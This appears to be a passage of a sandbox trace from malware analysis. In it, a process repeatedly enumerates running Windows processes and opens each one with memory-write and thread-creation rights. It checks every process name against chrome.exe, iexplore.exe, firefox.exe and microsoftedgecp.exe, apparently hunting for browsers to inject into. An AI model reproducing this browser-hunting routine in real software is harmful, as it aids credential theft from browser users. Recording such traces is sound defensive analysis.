	[0218.814] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0218.815] CloseHandle (hObject=0x188) returned 1
	[0218.815] Sleep (dwMilliseconds=0x64) 
	[0218.917] GetCurrentProcessId () returned 0x110
	[0218.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0218.923] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0218.925] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0218.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0218.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4b54
	[0218.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.929] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.929] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.930] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.930] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0218.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4b58
	[0218.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.931] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.931] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.932] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.932] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0218.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4b5c
	[0218.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.937] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0218.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.937] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.937] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0218.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.938] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0218.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4b60
	[0218.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.939] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.939] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.939] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.940] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0218.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4b64
	[0218.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0218.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.941] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0218.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.942] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0218.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4b68
	[0218.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.943] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0218.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.943] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.943] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0218.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.944] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0218.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4b6c
	[0218.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.945] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0218.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.945] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.945] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0218.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.945] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0218.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4b70
	[0218.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.947] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0218.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.947] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.947] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0218.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.948] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4b74
	[0218.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.949] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.949] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.950] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4b78
	[0218.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.951] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.952] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.952] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.953] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4b7c
	[0218.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4b80
	[0218.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.957] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.957] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.958] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.958] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4b84
	[0218.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.959] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.960] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.960] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4b88
	[0218.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.961] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.961] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.962] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.962] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4b8c
	[0218.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.965] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.966] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.966] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.966] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0218.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4b90
	[0218.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.967] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0218.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.968] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.968] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0218.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.968] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4b94
	[0218.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.969] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.970] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.970] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.970] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0218.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4b98
	[0218.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.971] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.972] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.972] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.972] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0218.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4b9c
	[0218.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.973] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0218.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.974] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.974] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0218.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.974] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0218.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4ba0
	[0218.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.975] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0218.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.975] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.976] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0218.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.976] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0218.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4ba4
	[0218.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.977] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0218.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.980] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.980] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0218.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.980] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0218.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4ba8
	[0218.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.982] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0218.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.982] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.982] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0218.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.982] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0218.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4bac
	[0218.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.983] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0218.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.984] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.984] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0218.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.984] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0218.984] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0218.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4bb0
	[0218.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.985] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0218.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.985] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.986] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0218.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
